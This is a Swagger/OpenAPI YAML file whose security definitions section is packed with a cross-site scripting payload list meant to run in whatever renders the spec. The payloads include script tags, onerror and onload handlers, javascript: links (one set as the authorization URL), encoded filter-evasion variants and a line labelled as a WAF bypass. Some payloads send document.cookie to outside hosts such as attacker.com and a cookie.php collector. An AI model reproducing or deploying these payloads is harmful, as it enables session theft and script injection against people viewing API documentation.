swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2<img src='https://attacker.com/log.php?HTML=>
<svg/onload=alert(333)>
<IMG SRC=JAVASCRIPT:ALERT("XSS")> 
<IMG SRC=https://sam1.xss.ht/f)>
<img src="x:ö" title="onerror=alert(1)//">
<img src=https://sam1.xss.ht/f onerror=alert(1)>
cloudflare waf bypass
<img src=x onError=import('//1152848220/')>
<a href="javascript&#58alert(document.domain)">JS - Numerical Entities</a>
<a href="javascript&#x3ax=1;alert(document.domain)">JS - Hex Entities</a>
<img src="data:image/svg+xml;utf8,&lt;svg xmlns=&quot;http://www.w3.org/2000/svg&quot; xmlns:xlink=&quot;http://www.w3.org/1999/xlink&quot; &gt;&#10;&lt;g&gt;&#10;&#9;&lt;rect onclick=&quot;alert(1)&quot; width=&quot;300&quot; height=&quot;300&quot;/&gt;&#10;&lt;/g&gt;&#10;&lt;/svg&gt;" alt="">
<object data=javascript:confirm(document.domain)>
%5B'-alert(document.cookie)-'%5D
l0cpd%22};a=alert,b=document.domain,a(b)//

%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
<h1>holaaaaaaa||<a href="http://<a href="http://<a href="http://<a href="javascript:alert(document.cookie)" onmouseover="javascript:alert(document.cookie)">aaaaaaaaaaaaaaaaaaaaaaaaaagle.com</a>">aaaaaaaaaaaaaaaaaaaaaaaaaagle.com</a>">aaaaaaaaaaaaaaaaaaaaaaaaaagle.com</a>">gle.com</a> hhh

<h1>holaaaaaaa||<a href="http://<a href="http://<a href="http://<a href="javascript:window.location='https://growncheckerworl.com/cookie.php?cookie=document.cookie'" >aaaaaaaaaaaaaaaaaaaaaaaaaagle.com</a>">aaaaaaaaaaaaaaaaaaaaaaaaaagle.com</a>">aaaaaaaaaaaaaaaaaaaaaaaaaagle.com</a>">gle.com</a> hhhk

<IMG SRC=1 onerror=alert(1)>
<head><meta http-equiv="refresh" content="0;url=404.html"></head>
%22%26gt%3B%26lt%3Bmeta+http-equiv%3D%22refresh%22+content+%3D%220%3B+url%3D%2F%2Fbit.ly%22%26gt%3B
%3c%3cs%3escript%3ealert%601%60%3c%3cs%3e/script%3e
"&gt;&lt;meta http-equiv="refresh" content ="0; url=//bit.ly"&gt;
"><img%20src%3dx%20onerro%3d><svg%20onload%3dalert%281%29>
<marquee loop%3d1 width%3d0 onfinish%3dco\u006efirm(document.cookie)>XSS<%2fmarquee>
"><img%20src=x%20onerror%3Dprompt%26%23x000000028%3Bdocument.domain)>
"><img%20src%3dx%20onerro%3d><img/src=1%20onerror=alert(1)>
"><img onerro=><img src=1 onerror=alert`xss`>
><img onerro=><img src=1 onerror=prompt(document.domain)>
%27%7D;%20alert(document.cookie);%7D)()//

%22%3E%3Cimg%20src=x%20onerror%3Dprompt%26%23x000000028%3Bdocument.domain)%3E
<iframe src=”%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)”>
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "0.0.1"
  title: Example Title
  description: Please Authorize!
paths:
  /:
    get:
      responses:
        200:
          description: Successful respons
